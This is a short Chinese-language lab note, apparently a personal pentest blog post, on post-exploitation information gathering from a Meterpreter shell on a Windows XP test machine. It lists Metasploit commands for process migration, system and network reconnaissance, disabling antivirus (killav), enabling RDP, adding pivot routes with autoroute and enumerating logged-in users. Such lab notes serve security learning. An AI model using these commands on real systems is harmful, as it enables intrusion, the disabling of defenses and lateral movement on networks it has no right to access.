在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础
记录一下关于meterpreter 信息收集的使用
环境: kali linux 192.168.190.141
xp靶机 192.168.190.140
生成木马 监听反弹shell上线
信息收集:
========================================================================================================================
0x01进程迁移:
ps命令获取目标正在运行的进程:
getpid命令查看 meterpreter shell的进程号:
可以看到pid为488 进程名为win.exe
使用migrate命令 进行shell的进程迁移:
成功迁移到pid为768的explorer.exe进程中。
迁移后原shell的进程(pid为488)会自动关闭,没有关闭也可以输入kill指令关闭 kill 488
也可以使用自动迁移进程命令:
run post/windows/manage/migrate
0x02 系统命令
获得稳定进程后,接下来收集系统信息。
sysinfo查看目标系统信息
查看是否是虚拟机 run post/windows/gather/checkvm
idletime命令查看目标机最近运行时间:
route命令查看目标机完整网络设置:
getuid获得用户名和计算机名称
run post/windows/manage/killav 命令关闭杀毒软件
run post/windows/manage/enable_rdp 开启3389
run get_local_subnets 查看目标机本地子网情况
在meterpreter 会话上直接添加去往目标网段的路由
run autoroute -s xxxxx
查看路由添加情况
run autoroute -p
枚举当前有多少用户:
run post/windows/gather/enum_logged_users
